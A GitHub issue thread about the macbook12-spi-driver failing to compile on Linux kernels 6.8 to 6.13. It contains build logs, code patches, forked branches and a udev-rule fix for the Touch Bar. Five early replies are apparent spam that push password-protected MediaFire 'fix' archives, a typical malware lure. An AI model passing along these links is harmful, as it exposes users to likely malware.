roadrunner2/macbook12-spi-driver #71: Driver not working on kernel 6.10.6-200.fc40.x86_64

Bandito11, 2024-08-28:
`DKMS make.log for applespi-0.1 for kernel 6.10.6-200.fc40.x86_64 (x86_64)
Wed Aug 28 02:38:45 AM EDT 2024
make -C /lib/modules/6.10.6-200.fc40.x86_64/build M=/var/lib/dkms/applespi/0.1/build modules
make[1]: Entering directory '/usr/src/kernels/6.10.6-200.fc40.x86_64'
  CC [M]  /var/lib/dkms/applespi/0.1/build/apple-ibridge.o
  CC [M]  /var/lib/dkms/applespi/0.1/build/apple-ib-tb.o
  CC [M]  /var/lib/dkms/applespi/0.1/build/apple-ib-als.o
/var/lib/dkms/applespi/0.1/build/apple-ib-tb.c: In function ‘appletb_fill_report_info’:
/var/lib/dkms/applespi/0.1/build/apple-ib-tb.c:949:9: warning: enumeration value ‘HID_REPORT_TYPES’ not handled in switch [-Wswitch]
  949 |         switch (field->report->type) {
      |         ^~~~~~
/var/lib/dkms/applespi/0.1/build/apple-ibridge.c:192:6: warning: no previous prototype for ‘appleib_detach_and_free_hid_driver’ [-Wmissing-prototypes]
  192 | void appleib_detach_and_free_hid_driver(struct appleib_device *ib_dev,
      |      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/var/lib/dkms/applespi/0.1/build/apple-ibridge.c:901:10: error: ‘struct acpi_driver’ has no member named ‘owner’
  901 |         .owner          = THIS_MODULE,
      |          ^~~~~
In file included from ./arch/x86/include/asm/mem_encrypt.h:15,
                 from ./include/linux/mem_encrypt.h:17,
                 from ./arch/x86/include/asm/processor-flags.h:6,
                 from ./arch/x86/include/asm/irqflags.h:5,
                 from ./include/linux/irqflags.h:18,
                 from ./include/linux/spinlock.h:59,
                 from ./include/linux/mmzone.h:8,
                 from ./include/linux/gfp.h:7,
                 from ./include/linux/slab.h:16,
                 from ./include/linux/resource_ext.h:11,
                 from ./include/linux/acpi.h:13,
                 from /var/lib/dkms/applespi/0.1/build/apple-ibridge.c:45:
./include/linux/init.h:180:21: error: initialization of ‘const struct acpi_device_id *’ from incompatible pointer type ‘struct module *’ [-Wincompatible-pointer-types]
  180 | #define THIS_MODULE (&__this_module)
      |                     ^
/var/lib/dkms/applespi/0.1/build/apple-ibridge.c:901:27: note: in expansion of macro ‘THIS_MODULE’
  901 |         .owner          = THIS_MODULE,
      |                           ^~~~~~~~~~~
./include/linux/init.h:180:21: note: (near initialization for ‘appleib_driver.ids’)
  180 | #define THIS_MODULE (&__this_module)
      |                     ^
/var/lib/dkms/applespi/0.1/build/apple-ibridge.c:901:27: note: in expansion of macro ‘THIS_MODULE’
  901 |         .owner          = THIS_MODULE,
      |                           ^~~~~~~~~~~
make[3]: *** [scripts/Makefile.build:244: /var/lib/dkms/applespi/0.1/build/apple-ibridge.o] Error 1
make[3]: *** Waiting for unfinished jobs....
make[2]: *** [/usr/src/kernels/6.10.6-200.fc40.x86_64/Makefile:1946: /var/lib/dkms/applespi/0.1/build] Error 2
make[1]: *** [Makefile:252: __sub-make] Error 2
make[1]: Leaving directory '/usr/src/kernels/6.10.6-200.fc40.x86_64'
make: *** [Makefile:22: all] Error 2
`

Here is the log file. Please help :(

rajnikyadav, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Evul88, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

li371359001, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

internet-person, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

RamtinKosari, 2024-08-28:
i have same problem this driver is not working on kernel 6 version

Ethelnol, 2024-09-06:
i downloaded and used the almas version for linux kernel 6.1.0-25 and was able to get it to compile after changing 2 lines of code that errored
i solved apple-ib-tb.c:949 by adding `default: break;` on line 956-957 after `case HID_FEATURE_REPORT: report_info->report_type = 3; break;` on 954-955
i was only given one other error apple-ibridge.c:905 which i fixed by changing `void` in `static void appleib_remove(struct acpi_device *acpi)` on 846 to `int` and `return;` on 852 to `return 1;`

after compilation and reboot, i needed to run `sudo echo '1-3' > /sys/bus/usb/drivers/usb/unbind && sudo echo '1-3' > /sys/bus/usb/drivers/usb/bind` to get the touchbar to work as recommended here [https://github.com/roadrunner2/macbook12-spi-driver/issues/42#issuecomment-602160740](url)

miguelqvd, 2024-11-05:
Is this repository being regularly merged to linux kernel?

arag0re, 2025-02-17:
Hey, I got the driver running on my Ubuntu 24.04 install on a mbp13,2 on kernel 6.8 for a while, with the patches from this issue aswell as the macbook-quirks.service from issue #42. Recently I upgraded to kernel 6.11 and I cant get the driver to work anymore. I fixed some more compile errors, but even after that the touchbar wont turn on anymore. Will upload my fixes and dmesg logs later, maybe someone can help 🍻

miguelqvd, 2025-02-19:
Thank you for your efforts. I'm trying to bring a MacBook 8,1 back to life. That model had a very bad reputation due to over heating. Surprisedly, one can get a marvelous user experience with that machine and ubuntu. It works really fast and fluid and no overheating at all. Sadly, suspension mode, keyboard+touchpad, bluetooth and audio (only jack output is working) are preventing me from making a daily use of that machine.

jussike, 2025-03-01:
Please check my fork https://github.com/jussike/macbook12-spi-driver/commits/touchbar-driver-hid-driver/

It can be compiled against newer kernel, 6.8 at least.
You'll not need to compile applespi at all because it's already merged to mainline. It's removed on my fork.

exorsize, 2025-03-19:
> Please check my fork https://github.com/jussike/macbook12-spi-driver/commits/touchbar-driver-hid-driver/
> 
> It can be compiled against newer kernel, 6.8 at least. You'll not need to compile applespi at all because it's already merged to mainline. It's removed on my fork.

fails to compile on arch, kernel 6.13.7, mbp 14,3.
please advice

`DKMS (dkms-3.1.6) make.log for applespi/0.1 for kernel 6.13.7-arch1-1 (x86_64)
Wed Mar 19 03:06:07 CET 2025

Cleaning build area
# command: make clean
make -C /lib/modules/6.13.7-arch1-1/build M=/var/lib/dkms/applespi/0.1/build clean
make[1]: Entering directory '/usr/lib/modules/6.13.7-arch1-1/build'
make[2]: Entering directory '/var/lib/dkms/applespi/0.1/build'
make[2]: Leaving directory '/var/lib/dkms/applespi/0.1/build'
make[1]: Leaving directory '/usr/lib/modules/6.13.7-arch1-1/build'

# exit code: 0
# elapsed time: 00:00:00
----------------------------------------------------------------

Building module(s)
# command: make -j8 KERNELRELEASE=6.13.7-arch1-1
make -C /lib/modules/6.13.7-arch1-1/build M=/var/lib/dkms/applespi/0.1/build modules
make[1]: Entering directory '/usr/lib/modules/6.13.7-arch1-1/build'
make[2]: Entering directory '/var/lib/dkms/applespi/0.1/build'
  CC [M]  apple-ibridge.o
  CC [M]  apple-ib-tb.o
  CC [M]  apple-ib-als.o
apple-ib-als.c:679:19: error: initialization of ‘void (*)(struct platform_device *)’ from incompatible pointer type ‘int (*)(struct platform_device *)’ [-Wincompatible-pointer-types]
  679 |         .remove = appleals_platform_remove,
      |                   ^~~~~~~~~~~~~~~~~~~~~~~~
apple-ib-als.c:679:19: note: (near initialization for ‘appleals_platform_driver.remove’)
apple-ib-tb.c:1295:19: error: initialization of ‘void (*)(struct platform_device *)’ from incompatible pointer type ‘int (*)(struct platform_device *)’ [-Wincompatible-pointer-types]
 1295 |         .remove = appletb_platform_remove,
      |                   ^~~~~~~~~~~~~~~~~~~~~~~
apple-ib-tb.c:1295:19: note: (near initialization for ‘appletb_platform_driver.remove’)
make[4]: *** [/usr/lib/modules/6.13.7-arch1-1/build/scripts/Makefile.build:196: apple-ib-als.o] Error 1
make[4]: *** Waiting for unfinished jobs....
make[4]: *** [/usr/lib/modules/6.13.7-arch1-1/build/scripts/Makefile.build:196: apple-ib-tb.o] Error 1
apple-ibridge.c:752:25: error: initialization of ‘const __u8 * (*)(struct hid_device *, __u8 *, unsigned int *)’ {aka ‘const unsigned char * (*)(struct hid_device *, unsigned char *, unsigned int *)’} from incompatible pointer type ‘__u8 * (*)(struct hid_device *, __u8 *, unsigned int *)’ {aka ‘unsigned char * (*)(struct hid_device *, unsigned char *, unsigned int *)’} [-Wincompatible-pointer-types]
  752 |         .report_fixup = appleib_report_fixup,
      |                         ^~~~~~~~~~~~~~~~~~~~
apple-ibridge.c:752:25: note: (near initialization for ‘appleib_hid_driver.report_fixup’)
apple-ibridge.c:901:10: error: ‘struct acpi_driver’ has no member named ‘owner’
  901 |         .owner          = THIS_MODULE,
      |          ^~~~~
In file included from /usr/lib/modules/6.13.7-arch1-1/build/arch/x86/include/asm/mem_encrypt.h:15,
                 from /usr/lib/modules/6.13.7-arch1-1/build/include/linux/mem_encrypt.h:17,
                 from /usr/lib/modules/6.13.7-arch1-1/build/arch/x86/include/asm/processor-flags.h:6,
                 from /usr/lib/modules/6.13.7-arch1-1/build/arch/x86/include/asm/irqflags.h:5,
                 from /usr/lib/modules/6.13.7-arch1-1/build/include/linux/irqflags.h:18,
                 from /usr/lib/modules/6.13.7-arch1-1/build/include/linux/spinlock.h:59,
                 from /usr/lib/modules/6.13.7-arch1-1/build/include/linux/mmzone.h:8,
                 from /usr/lib/modules/6.13.7-arch1-1/build/include/linux/gfp.h:7,
                 from /usr/lib/modules/6.13.7-arch1-1/build/include/linux/slab.h:16,
                 from /usr/lib/modules/6.13.7-arch1-1/build/include/linux/resource_ext.h:11,
                 from /usr/lib/modules/6.13.7-arch1-1/build/include/linux/acpi.h:13,
                 from apple-ibridge.c:45:
/usr/lib/modules/6.13.7-arch1-1/build/include/linux/init.h:180:21: error: initialization of ‘const struct acpi_device_id *’ from incompatible pointer type ‘struct module *’ [-Wincompatible-pointer-types]
  180 | #define THIS_MODULE (&__this_module)
      |                     ^
apple-ibridge.c:901:27: note: in expansion of macro ‘THIS_MODULE’
  901 |         .owner          = THIS_MODULE,
      |                           ^~~~~~~~~~~
/usr/lib/modules/6.13.7-arch1-1/build/include/linux/init.h:180:21: note: (near initialization for ‘appleib_driver.ids’)
  180 | #define THIS_MODULE (&__this_module)
      |                     ^
apple-ibridge.c:901:27: note: in expansion of macro ‘THIS_MODULE’
  901 |         .owner          = THIS_MODULE,
      |                           ^~~~~~~~~~~
make[4]: *** [/usr/lib/modules/6.13.7-arch1-1/build/scripts/Makefile.build:196: apple-ibridge.o] Error 1
make[3]: *** [/usr/lib/modules/6.13.7-arch1-1/build/Makefile:1989: .] Error 2
make[2]: *** [/usr/lib/modules/6.13.7-arch1-1/build/Makefile:251: __sub-make] Error 2
make[2]: Leaving directory '/var/lib/dkms/applespi/0.1/build'
make[1]: *** [Makefile:251: __sub-make] Error 2
make[1]: Leaving directory '/usr/lib/modules/6.13.7-arch1-1/build'
make: *** [Makefile:13: all] Error 2

# exit code: 2
# elapsed time: 00:00:01
----------------------------------------------------------------
`

jussike, 2025-03-20:
> Hello. I have a macbook 8,1, running ubuntu 24.04 with the 6.8 kernel. My keyboard and trackpad sometimes do work upon rebooting, and sometimes do not. I am trying the [touchbar-driver-hid-driver/](https://github.com/jussike/macbook12-spi-driver/commits/touchbar-driver-hid-driver/) branch. I get the same error as I did with the original driver from the main branch. Here is what I see:
> 
> ```
> root@macbook:~# dkms install -m applespi -v 0.1
> Sign command: /usr/bin/kmodsign
> Signing key: /var/lib/shim-signed/mok/MOK.priv
> Public certificate (MOK): /var/lib/shim-signed/mok/MOK.der
> Deprecated feature: REMAKE_INITRD (/var/lib/dkms/applespi/0.1/source/dkms.conf)
> 
> Building module:
> Cleaning build area...
> make -j4 KERNELRELEASE=6.8.0-55-generic....(bad exit status: 2)
> ERROR (dkms apport): binary package for applespi: 0.1 not found
> Error! Bad return status for module build on kernel: 6.8.0-55-generic (x86_64)
> Consult /var/lib/dkms/applespi/0.1/build/make.log for more information.
> ```
> 
> and here is what the make.log tells me:
> 
> ```
> DKMS make.log for applespi-0.1 for kernel 6.8.0-55-generic (x86_64)
> Do 20. Mär 11:48:56 +0330 2025
> make -C /lib/modules/6.8.0-55-generic/build M=/var/lib/dkms/applespi/0.1/build modules
> make[1]: Entering directory '/usr/src/linux-headers-6.8.0-55-generic'
> warning: the compiler differs from the one used to build the kernel
>   The kernel was built by: x86_64-linux-gnu-gcc-13 (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0
>   You are using:           gcc-13 (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0
>   CC [M]  /var/lib/dkms/applespi/0.1/build/applespi.o
>   CC [M]  /var/lib/dkms/applespi/0.1/build/apple-ibridge.o
>   CC [M]  /var/lib/dkms/applespi/0.1/build/apple-ib-tb.o
>   CC [M]  /var/lib/dkms/applespi/0.1/build/apple-ib-als.o
> /var/lib/dkms/applespi/0.1/build/apple-ibridge.c:192:6: warning: no previous prototype for ‘appleib_detach_and_free_hid_driver’ [-Wmissing-proto>
>   192 | void appleib_detach_and_free_hid_driver(struct appleib_device *ib_dev,
>       |      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> /var/lib/dkms/applespi/0.1/build/apple-ib-tb.c: In function ‘appletb_fill_report_info’:
> /var/lib/dkms/applespi/0.1/build/apple-ib-tb.c:949:9: warning: enumeration value ‘HID_REPORT_TYPES’ not handled in switch [-Wswitch]
>   949 |         switch (field->report->type) {
>       |         ^~~~~~
> /var/lib/dkms/applespi/0.1/build/apple-ibridge.c:905:35: error: initialization of ‘void (*)(struct acpi_device *)’ from incompatible pointer typ>
>   905 |                 .remove         = appleib_remove,
>       |                                   ^~~~~~~~~~~~~~
> /var/lib/dkms/applespi/0.1/build/apple-ibridge.c:905:35: note: (near initialization for ‘appleib_driver.ops.remove’)
> /var/lib/dkms/applespi/0.1/build/apple-ib-als.c: In function ‘appleals_config_iio’:
> /var/lib/dkms/applespi/0.1/build/apple-ib-als.c:463:36: warning: passing argument 1 of ‘iio_device_alloc’ makes pointer from integer without a c>
>   463 |         iio_dev = iio_device_alloc(sizeof(als_dev));
>       |                                    ^~~~~~~~~~~~~~~
>       |                                    |
>       |                                    long unsigned int
> In file included from ./include/linux/iio/buffer.h:10,
>                  from /var/lib/dkms/applespi/0.1/build/apple-ib-als.c:32:
> ./include/linux/iio/iio.h:733:49: note: expected ‘struct device *’ but argument is of type ‘long unsigned int’
>   733 | struct iio_dev *iio_device_alloc(struct device *parent, int sizeof_priv);
>       |                                  ~~~~~~~~~~~~~~~^~~~~~
> /var/lib/dkms/applespi/0.1/build/apple-ib-als.c:463:19: error: too few arguments to function ‘iio_device_alloc’
>   463 |         iio_dev = iio_device_alloc(sizeof(als_dev));
>       |                   ^~~~~~~~~~~~~~~~
> ./include/linux/iio/iio.h:733:17: note: declared here
>   733 | struct iio_dev *iio_device_alloc(struct device *parent, int sizeof_priv);
>       |                 ^~~~~~~~~~~~~~~~
> In file included from /var/lib/dkms/applespi/0.1/build/apple-ib-als.c:36:
> /var/lib/dkms/applespi/0.1/build/apple-ib-als.c:485:72: error: ‘struct iio_dev’ has no member named ‘id’
>   485 |         iio_trig = iio_trigger_alloc("%s-dev%d", iio_dev->name, iio_dev->id);
>       |                                                                        ^~
> ./include/linux/iio/trigger.h:160:61: note: in definition of macro ‘iio_trigger_alloc’
>   160 |         __iio_trigger_alloc((parent), THIS_MODULE, (fmt), ##__VA_ARGS__)
>       |                                                             ^~~~~~~~~~~
> ./include/linux/iio/trigger.h:160:29: error: passing argument 1 of ‘__iio_trigger_alloc’ from incompatible pointer type [-Werror=incompatible-po>
>   160 |         __iio_trigger_alloc((parent), THIS_MODULE, (fmt), ##__VA_ARGS__)
>       |                             ^~~~~~~~
>       |                             |
[... 81 lines cut ...]
> /var/lib/dkms/applespi/0.1/build/applespi.c: In function ‘applespi_save_bl_level’:
> /var/lib/dkms/applespi/0.1/build/applespi.c:1830:15: error: implicit declaration of function ‘efivar_entry_set_safe’ [-Werror=implicit-function->
>  1830 |         sts = efivar_entry_set_safe((efi_char16_t *)EFI_BL_LEVEL_NAME, efi_guid,
>       |               ^~~~~~~~~~~~~~~~~~~~~
> /var/lib/dkms/applespi/0.1/build/applespi.c: At top level:
[... cut ...]
> make[3]: *** [scripts/Makefile.build:243: /var/lib/dkms/applespi/0.1/build/apple-ibridge.o] Error 1
> make[2]: *** [/usr/src/linux-headers-6.8.0-55-generic/Makefile:1925: /var/lib/dkms/applespi/0.1/build] Error 2
> make[1]: *** [Makefile:240: __sub-make] Error 2
> make[1]: Leaving directory '/usr/src/linux-headers-6.8.0-55-generic'
> make: *** [Makefile:16: all] Error 2
> ```
> 
> Any ideas?

Seems that you are using wrong branch or commit.
See the current hash with command
$ git rev-parse --short HEAD
It should give 774b401

jussike, 2025-03-20:
> fails to compile on arch, kernel 6.13.7, mbp 14,3. please advice
>
> ```
> DKMS (dkms-3.1.6) make.log for applespi/0.1 for kernel 6.13.7-arch1-1 (x86_64)
> Wed Mar 19 03:06:07 CET 2025
>
> Cleaning build area [...]

I have no time to install 6.13 today but I fixed compiling against 6.11
https://github.com/jussike/macbook12-spi-driver/commits/touchbar-driver-hid-driver-linux-6.11

And I made a fix for 6.13 also but I didn't try even to compile it. Please try:
https://github.com/jussike/macbook12-spi-driver/commits/touchbar-driver-hid-driver-linux-6.13

arag0re, 2025-03-20:
@jussike use the patched version from almas https//github.com/almas/macbook12-spi-driver 
in combination with the macbook-quircks.service from issue #42. worked for me on 6.8

tkalant, 2025-03-21:
> Seems that you are using wrong branch or commit.
> See the current hash with command
> $ git rev-parse --short HEAD
> It should give [774b401](https://github.com/roadrunner2/macbook12-spi-driver/commit/774b40105cd7c861cdeb628c966db23312951a8b)

Hello @jussike Thank you for responding. You were right. I cloned the correct repository, ran the installation, and it seems like it went without a problem, but I keep having the same issue. After rebooting sometimes the keyboard works and sometimes not - here is what I see after installing:
```

Sign command: /usr/bin/kmodsign
Signing key: /var/lib/shim-signed/mok/MOK.priv
Public certificate (MOK): /var/lib/shim-signed/mok/MOK.der
Deprecated feature: REMAKE_INITRD (/usr/src/applespi-0.1/dkms.conf)
Creating symlink /var/lib/dkms/applespi/0.1/source -> /usr/src/applespi-0.1

Building module:
Cleaning build area...
make -j4 KERNELRELEASE=6.8.0-55-generic....
Signing module /var/lib/dkms/applespi/0.1/build/apple-ibridge.ko
Signing module /var/lib/dkms/applespi/0.1/build/apple-ib-tb.ko
Signing module /var/lib/dkms/applespi/0.1/build/apple-ib-als.ko
Cleaning build area...

apple-ibridge.ko.zst:
Running module version sanity check.
 - Original module
   - No original module exists within this kernel
 - Installation
   - Installing to /lib/modules/6.8.0-55-generic/updates/dkms/

apple-ib-tb.ko.zst:
Running module version sanity check.
 - Original module
   - No original module exists within this kernel
 - Installation
   - Installing to /lib/modules/6.8.0-55-generic/updates/dkms/

apple-ib-als.ko.zst:
Running module version sanity check.
 - Original module
   - No original module exists within this kernel
 - Installation
   - Installing to /lib/modules/6.8.0-55-generic/updates/dkms/
depmod....

```

> > 
> 
> I have no time to install 6.13 today but I fixed compiling against 6.11 https://github.com/jussike/macbook12-spi-driver/commits/touchbar-driver-hid-driver-linux-6.11

I also installed kernel 6.11, changed to that kernel on grub when booting, and ran the installation from the 6.11 branch you made yesterday. I made sure I am on the `c0cf3bf` commit. That did not work, here is what I saw: 

```
Building module:
Cleaning build area...
make -j4 KERNELRELEASE=6.11.0-061100-generic...(bad exit status: 2)
ERROR (dkms apport): binary package for applespi: 0.1 not found
Error! Bad return status for module build on kernel: 6.11.0-061100-generic (x86_64)
Consult /var/lib/dkms/applespi/0.1/build/make.log for more information.
```

> use the patched version from almas https://github.com/almas/macbook12-spi-driver
> in combination with the macbook-quircks.service from issue [#42](https://github.com/roadrunner2/macbook12-spi-driver/issues/42). worked for me on 6.8
@arag0re Thank you. I tried this version from almas with 6.8 kernel, it did not work for me. Kept getting the same error as before. And it seems to me (might be wrong) that the macbook-quirks.service is related to the touchbar, which my macbook does not have.

jussike, 2025-03-21:
> After rebooting sometimes the keyboard works and sometimes not

My fork has no keyboard/touchpad driver bc it's a part of upstream kernel (applespi). Perhaps you should report the upstream driver maintainer. You may use my fork as a touchbar driver if you have any on your device.

> Consult /var/lib/dkms/applespi/0.1/build/make.log for more information.

You didn't attach the make.log

tkalant, 2025-03-22:
> My fork has no keyboard/touchpad driver bc it's a part of upstream kernel (applespi). Perhaps you should report the upstream driver maintainer. You may use my fork as a touchbar driver if you have any on your device.

I didn't realize your fork does not have a driver for the keyboard. there is no touchar on my device so I guess I only have the original repository to try (roadrunner) as an option, which did not work. 
Thank you anyway.

exorsize, 2025-03-26:
> And I made a fix for 6.13 also but I didn't try even to compile it. Please try: https://github.com/jussike/macbook12-spi-driver/commits/touchbar-driver-hid-driver-linux-6.13

the 6.13 fix compiled, installed and works well for me.
thank you!

scuty2000, 2025-05-15:
Hi everyone,

I'm trying to get Linux fully working on my MacBook Pro 13,2 as a replacement for macOS — I'm really tired of macOS, but the hardware is still great, so I'd love to keep using this machine.

I've managed to get both Wi-Fi and sound working, but I'm still stuck on getting the Touch Bar to function. I've tried various versions of the `applespi`/`apple_ibridge` modules, including several branches like the 6.11/13 fix versions, but no luck so far.

Currently, I'm running Kubuntu 22.04 with the 6.8.0-59 kernel. The modules install without errors and appear to load correctly (outputs attached below), but the Touch Bar remains completely off — no response at all. I’ve tried various workarounds, but nothing has helped.

Interestingly, I had it working in the past with Ubuntu 18, but now it seems much harder to get it going.

For installing I completely wiped the disk after making a EFI partition wipe, to retain the EmbeddedOS part needed by the touchbar, and in fact if I boot in macOS recovery mode (option+r) the touchbar works, so I think it is not missing the firmware.

I also tried removing `usbmuxd` to rule that out, but it didn’t help.

Has anyone had recent success with the Touch Bar on this model? Any ideas or things I could try would be really appreciated.

Thanks!

```bash
(base) scutigliani@scutigliani-MacBookPro:~$ lsmod | grep "apple"
apple_ib_tb            32768  0
apple_ib_als           20480  0
industrialio_triggered_buffer    12288  2 hid_sensor_trigger,apple_ib_als
applesmc               28672  0
industrialio          126976  6 industrialio_triggered_buffer,hid_sensor_trigger,kfifo_buf,apple_ib_als,hid_sensor_als
apple_mfi_fastcharge    16384  0
apple_ibridge          24576  2 apple_ib_als,apple_ib_tb
hid                   180224  7 usbhid,apple_ib_als,hid_sensor_hub,hid_generic,apple_ibridge,uhid,hid_logitech_hidpp
applespi               53248  0
```

```
(base) scutigliani@scutigliani-MacBookPro:~$ sudo dmesg | grep -iE "firmware|ibridge|apple_ib_tb"
[sudo] password di scutigliani: 
[    0.130193] ACPI: [Firmware Bug]: BIOS _OSI(Linux) query ignored
[    1.696967] usb 1-3: Product: iBridge
[    1.877094] input: Apple Inc. iBridge as /devices/pci0000:00/0000:00:14.0/usb1/1-3/1-3:1.2/0003:05AC:8600.0001/input/input6
[    1.890737] i915 0000:00:02.0: [drm] Finished loading DMC firmware i915/skl_dmc_ver1_27.bin (v1.27)
[    1.928541] hid-generic 0003:05AC:8600.0001: input,hidraw0: USB HID v1.01 Keyboard [Apple Inc. iBridge] on usb-0000:00:14.0-3/input2
[    1.929184] hid-generic 0003:05AC:8600.0002: hiddev0,hidraw1: USB HID v1.01 Device [Apple Inc. iBridge] on usb-0000:00:14.0-3/input3
[    1.931372] hid-sensor-hub 0003:05AC:8600.0002: hiddev0,hidraw1: USB HID v1.01 Device [Apple Inc. iBridge] on usb-0000:00:14.0-3/input3
[    7.665145] input: Apple Inc. iBridge as /devices/pci0000:00/0000:00:14.0/usb1/1-3/1-3:1.2/0003:05AC:8600.0001/input/input8
[    7.718235] apple-ibridge-hid 0003:05AC:8600.0001: input,hidraw0: USB HID v1.01 Keyboard [Apple Inc. iBridge] on usb-0000:00:14.0-3/input2
[    8.273569] Bluetooth: hci0: BCM: firmware Patch file not found, tried:
[    8.380815] usb 1-3: Found UVC 1.50 device iBridge (05ac:8600)
[    8.429832] brcmfmac 0000:02:00.0: Direct firmware load for brcm/brcmfmac43602-pcie.Apple Inc.-MacBookPro13,2.bin failed with error -2
[    8.435922] brcmfmac 0000:02:00.0: Direct firmware load for brcm/brcmfmac43602-pcie.clm_blob failed with error -2
[    8.435976] brcmfmac 0000:02:00.0: Direct firmware load for brcm/brcmfmac43602-pcie.txcap_blob failed with error -2
[    8.506547] input: Apple Inc. iBridge as /devices/pci0000:00/0000:00:14.0/usb1/1-3/1-3:1.2/0003:05AC:8600.0001/input/input9
[    8.592612] apple-ibridge-hid 0003:05AC:8600.0001: input,hidraw0: USB HID v1.01 Keyboard [Apple Inc. iBridge] on usb-0000:00:14.0-3/input2
[    8.690439] input: Apple Inc. iBridge as /devices/pci0000:00/0000:00:14.0/usb1/1-3/1-3:1.2/0003:05AC:8600.0001/input/input10
[    8.722972] brcmfmac: brcmf_c_preinit_dcmds: Firmware: BCM43602/2 wl0: Nov 10 2015 06:38:10 version 7.35.177.61 (r598657) FWID 01-ea662a8c
[    8.745539] apple-ibridge-hid 0003:05AC:8600.0001: input,hidraw0: USB HID v1.01 Keyboard [Apple Inc. iBridge] on usb-0000:00:14.0-3/input2
[   13.723966] usb 1-3: Found UVC 1.50 device iBridge (05ac:8600)
[   13.726486] input: Apple Inc. iBridge as /devices/pci0000:00/0000:00:14.0/usb1/1-3/1-3:1.2/0003:05AC:8600.0003/input/input16
[   13.778534] apple-ibridge-hid 0003:05AC:8600.0003: input,hidraw0: USB HID v1.01 Keyboard [Apple Inc. iBridge] on usb-0000:00:14.0-3/input2
[   13.781010] hid-sensor-hub 0003:05AC:8600.0004: hiddev0,hidraw1: USB HID v1.01 Device [Apple Inc. iBridge] on usb-0000:00:14.0-3/input3
```

jussike, 2025-05-19:
> EDIT2: **_I SOLVED IT!_** I'LL LATER POST THE SOLUTION!

Great! Please post your solution.

scuty2000, 2025-05-19:
**Problem Description:**

The `apple-ibridge` driver system, particularly the `apple-ib-tb` sub-driver for the Touch Bar, relies on two distinct HID reports/interfaces exposed by the Apple iBridge chip (USB VID:05AC, PID:8600) under its first USB configuration:
1.  An interface/report for **Touch Bar Mode control** (ESC, Fn keys, Special keys).
2.  An interface/report for **Touch Bar Display control** (brightness, on/off).

Analysis of `lsusb -v -d 05ac:8600` for Configuration 1 (default) shows:
*   **USB Interface 2:** `bInterfaceClass 3 (HID)`, `bInterfaceProtocol 1 (Keyboard)`, `wDescriptorLength 83`.
*   **USB Interface 3:** `bInterfaceClass 3 (HID)`, `bInterfaceProtocol 1 (Keyboard)`, `wDescriptorLength 634`.

The `apple-ibridge-hid` driver (the HID muxer component of `apple-ibridge.c`) correctly probes the HID device created from **USB Interface 2**. The `apple-ib-tb` sub-driver's `probe` function is then called with this `hid_device`, and it successfully populates its `mode_info` structure by finding the `HID_USAGE_MODE` (0xff0004) in application 0x10006.

However, **USB Interface 3** (which is expected to provide the `HID_USAGE_DISP` for `disp_info`) is **claimed by the kernel's generic `hid-sensor-hub` driver**. This is evidenced by:
*   `dmesg` logs showing `hid-sensor-hub` binding to a `hid_device` (e.g., `0003:05AC:8600.000X` where X corresponds to Interface 3, often seen on `/input3`).
*   `ls -l /sys/bus/usb/devices/.../1-3:1.3/Y.Y.Y.Y/driver` pointing to `hid-sensor-hub`.

As a result, `apple-ibridge-hid` is not given a chance to probe the `hid_device` associated with USB Interface 3. Consequently, the `apple-ib-tb` sub-driver's `probe` function is not called for this second required interface, `tb_dev->disp_info.hdev` remains `NULL`, and the condition `if (tb_dev->mode_info.hdev && tb_dev->disp_info.hdev)` is never met. This prevents the full initialization of the Touch Bar, including setting its initial mode/display state, registering the input handler for Fn key events, and creating sysfs attributes. The Touch Bar remains non-functional.

**Workaround Implemented (via `udev` rule):**

To resolve this, a `udev` rule was created to forcibly unbind `hid-sensor-hub` from the `hid_device` associated with USB Interface 3, and then attempt to re-trigger a driver probe for that `hid_device`, allowing `apple-ibridge-hid` to claim it.

The effective `udev` rule in `/etc/udev/rules.d/98-apple-ibridge-custom.rules`:
```udev
ACTION=="add", SUBSYSTEM=="hid", ENV{HID_ID}=="0003:000005AC:00008600", ENV{HID_PHYS}=="*input3", ATTR{driver}=="hid-sensor-hub", \
  RUN+="/bin/sh -c '/usr/bin/logger -t UDEV-IBRIDGE Unbinding %k from hid-sensor-hub; echo %k > /sys%p/driver/unbind; /usr/bin/logger -t UDEV-IBRIDGE Unbound %k. Attempting to trigger drivers_probe; echo %k > /sys/bus/hid/drivers_probe; exit 0'"
```

**Explanation of the udev rule:**
*   `ACTION=="add", SUBSYSTEM=="hid"`: Triggers when a HID device is added.
*   `ENV{HID_ID}=="0003:000005AC:00008600"`: Matches the iBridge HID device by its vendor/product ID (case-corrected).
*   `ENV{HID_PHYS}=="*input3"`: Matches the physical path ending in `/input3`, which corresponds to USB Interface 3.
*   `ATTR{driver}=="hid-sensor-hub"`: Ensures this rule only runs if `hid-sensor-hub` is the driver currently bound (or about to bind) during the `add` event.
*   `RUN+=...`:
    *   Logs the attempt.
    *   `echo %k > /sys%p/driver/unbind`: Unbinds `hid-sensor-hub` from the specific HID device (`%k` is the kernel name of the HID device, e.g., `0003:05AC:8600.000X`). `%p` is its sysfs path.
    *   `echo %k > /sys/bus/hid/drivers_probe`: Triggers the HID core to re-probe drivers for the now-unbound HID device.

This workaround allows `apple-ibridge-hid` to subsequently probe the HID device from USB Interface 3. The `apple-ib-tb` sub-driver's `probe` is then called a second time, successfully populating `disp_info`, leading to full Touch Bar initialization and functionality.

**Proposed Long-Term Solution (Driver-Level Change):**

While the `udev` rule provides a functional workaround, it's not ideal as it relies on specific `sysfs` paths and external configuration. A more robust solution would involve changes at the driver level.

